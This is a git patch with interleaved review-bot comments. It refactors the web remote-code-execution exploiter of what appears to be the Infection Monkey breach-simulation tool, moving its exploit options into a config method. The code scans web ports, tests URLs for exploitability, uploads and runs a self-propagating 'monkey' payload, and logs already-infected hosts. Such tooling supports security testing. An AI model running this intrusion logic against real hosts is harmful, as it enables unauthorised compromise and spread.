From eae3f3440d4d383e7ac0d0e547a2a3a691c75f05 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Wed, 22 Aug 2018 13:33:36 +0300
Subject: [PATCH] Refactored exploit_host and added get_exploit_config
---
 infection_monkey/exploit/web_rce.py | 56 ++++++++++++++++++-----------
 1 file changed, 35 insertions(+), 21 deletions(-)
diff --git a/infection_monkey/exploit/web_rce.py b/infection_monkey/exploit/web_rce.py
index 777b256bd..c907ca08e 100644
--- a/infection_monkey/exploit/web_rce.py
+++ b/infection_monkey/exploit/web_rce.py
@@ -37,37 +37,51 @@ class WebRCE(HostExploiter):
 self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
 self.skip_exist = self._config.skip_exploit_if_file_exist
+ @staticmethod
+ def get_exploit_config():
+ """
+ Method that creates a dictionary of configuration values for exploit
+ :return: configuration dict
+ """
+ exploit_config = dict()
+
+ # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
+ # it's file to the default destination path.
+ exploit_config['dropper'] = False
+
+ # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
+ # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
+ exploit_config['upload_commands'] = None
+
+ # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
+ exploit_config['url_extensions'] = None
+
+ # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
+ exploit_config['stop_checking_urls'] = False
+
+ # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
+ exploit_config['blind_exploit'] = False
+
+ return exploit_config
+
 def exploit_host(self):
 """
 Override this method to pass custom arguments to default_exploit_host
 :return: True if exploited, False otherwise
 """
- return self.default_exploit_host()
-
- def default_exploit_host(self, dropper=False, upload_commands=None, url_extensions=None,
- stop_checking_urls=False, blind_exploit=False):
- """
- Standard framework usage (call this method in exploit_host function):
- :param dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
- it's file to the default destination path.
- :param upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
- Command must have "monkey_path" and "http_path" format parameters.
- :param url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
- :param stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
- :param blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
- :return: True if exploited and False otherwise.
- """
+ # We get exploit configuration
+ exploit_config = self.get_exploit_config()
 # Get open ports
 ports = self.get_ports_w(self.HTTP, ["http"])
 if not ports:
 return False
 # Get urls to try to exploit
- urls = self.build_potential_urls(ports, url_extensions)
+ urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
 vulnerable_urls = []
 for url in urls:
 if self.check_if_exploitable(url):
 vulnerable_urls.append(url)
- if stop_checking_urls:
+ if exploit_config['stop_checking_urls']:
 break
 self._exploit_info['vulnerable_urls'] = vulnerable_urls
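Review bot: The `exploit_host` docstring kept as context in this hunk still says `Override this method to pass custom arguments to default_exploit_host`, but the commit deletes `default_exploit_host` and moves those arguments into `get_exploit_config`; it should now read `Override get_exploit_config to change the default exploit configuration`, and the added `# We get exploit configuration` comment says nothing the next line does not. Because the five values are then read with `exploit_config['...']`, a subclass that overrides `get_exploit_config` and omits a key fails with KeyError part-way through the exploit flow; either state in the new method's docstring that an override must return all five keys, or merge over the base defaults before the lookups, e.g. `defaults = WebRCE.get_exploit_config()` / `defaults.update(self.get_exploit_config())` / `exploit_config = defaults`. As a point of style, the new method reads more clearly as one dict literal with the per-key comments inline than as `dict()` followed by five assignments, and `it's file` in the dropper comment should be `its file`. `exploit_host` continues past the end of this hunk.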
@@ -75,16 +89,16 @@ class WebRCE(HostExploiter):
 return False
 # Skip if monkey already exists and this option is given
- if not blind_exploit and self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
+ if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
 LOG.info("Host %s was already infected under the current configuration, done" % self.host)
 return True
 # Check for targets architecture (if it's 32 or 64 bit)
- if not blind_exploit and not self.set_host_arch(vulnerable_urls[0]):
+ if not exploit_config['blind_exploit'] and not self.set_host_arch(vulnerable_urls[0]):
 return False
 # Upload the right monkey to target
- data = self.upload_monkey(vulnerable_urls[0], upload_commands)
+ data = self.upload_monkey(vulnerable_urls[0], exploit_config['upload_commands'])
 if data is not False and data['response'] is False:
 return False
@@ -94,7 +108,7 @@ class WebRCE(HostExploiter):
 return False
 # Execute remote monkey
- if self.execute_remote_monkey(vulnerable_urls[0], data['path'], dropper) is False:
+ if self.execute_remote_monkey(vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
 return False
 return True
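Review bot: `exploit_config['blind_exploit']` is looked up twice in this hunk, and `exploit_config['upload_commands']` here and `exploit_config['dropper']` in the following hunk once each, which lengthens every `if` line and repeats the key strings that `get_exploit_config` also spells out; binding them once after the config is fetched, e.g. `blind_exploit = exploit_config['blind_exploit']`, keeps the conditions at their previous length and leaves one place to change if a key is renamed. The context line `if data is not False and data['response'] is False` lets a bare `False` from `upload_monkey` fall through, and the last hunk then indexes `data['path']`, which would raise TypeError rather than return False unless the unseen lines between the two hunks return early on it; worth confirming while this method is being reworked. The enclosing `exploit_host` begins before this hunk.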